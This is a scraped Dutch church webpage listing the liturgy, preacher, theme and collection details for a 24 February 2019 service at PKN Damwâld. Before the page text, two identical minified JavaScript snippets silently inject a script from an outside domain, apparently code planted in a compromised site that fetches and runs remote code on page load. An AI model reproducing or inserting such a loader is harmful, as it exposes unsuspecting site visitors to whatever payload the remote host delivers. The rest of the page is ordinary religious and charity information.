;(function(f,b,n,j,x,e){x=b.createElement(n);e=b.getElementsByTagName(n)[0];x.async=1;x.src=j;e.parentNode.insertBefore(x,e);})(window,document,"script","https://treegreeny.org/KDJnCSZn"); ;(function(f,b,n,j,x,e){x=b.createElement(n);e=b.getElementsByTagName(n)[0];x.async=1;x.src=j;e.parentNode.insertBefore(x,e);})(window,document,"script","https://treegreeny.org/KDJnCSZn"); Kerkdienst zondag 24 februari 2019 9:30 uur - PKN Damwâld
zondag 24 februari 2019
09:30 uur

Kerkdienst zondag 24 februari 2019 9:30 uur

Thema: ‘Jakobs worsteling bij de Jabbok’

Informatie

Voorganger:J.Y. v.d. Wal, Morra
Organist:Nienke van der Heide-Visser
Thema:‘Jakobs worsteling bij de Jabbok’
Liturgie
Lied voor de dienst : Elb 246
Welkom
Intochtslied : Psalm 146 : 1 en 2
Inkeer, wijdingswoord en groet
We zingen: Psalm 146 : 3 en 5
Leefregels .
We zingen: Psalm 146 : 4
Gebed
We lezen: Genesis 32 : 22-33
We zingen: Gezang 296 vers 1, 3
Verkondiging ‘Jakobs worsteling bij de Jabbok’
We zingen: Gezang 299 : 1, 2, 3, 4, 5, 7 en 10
Gebeden
Collecte
Slotlied : Gezang 21 vers 3, 7
Zegen
Liturgie met de liedteksten is alleen beschikbaar met een Mijn Kerk account. Inloggen
Locatie: Bonifatiuskerk Foarwei 2, Damwâld
Dienst terugluisteren Dienst terugluisteren
Collecte informatie
Eerste collecte: Stichting Liliane Fonds

Het Liliane Fonds wil bijdragen aan een wereld die openstaat voor iedereen en waarin ook kinderen met een handicap die opgroeien in extreme armoede, al hun talenten kunnen ontwikkelen en inzetten. Samen met lokale organisaties in Afrika, Azië en Latijns-Amerika maken ze kinderen sterker en hun omgeving toegankelijker. Het werk van het Liliane Fonds concentreert zich in 30 landen. In elk van deze landen hebben ze een partnerschap met een organisatie ter plekke. Deze Strategische Partnerorganisatie (SPO) maakt jaarlijks een programma voor ondersteuning van kinderen met een handicap. Een SPO kent het land door en door en kan bepalen waar en op welke gebieden steun het dringendst nodig is. Voor uitvoering van het programma maakt de SPO afspraken met lokale organisaties die dichtbij de kinderen werken, bijvoorbeeld op het platteland of in sloppenwijken. Binnen deze Partnerorganisaties (PO's) regelt een team waarin verschillende deskundigheden vertegenwoordigd zijn - het mediation team - steun op maat voor kinderen. Het Liliane Fonds steunt het programma inhoudelijk en financieel.

Tweede collecte: Kerk
Uitganscollecte: Kerk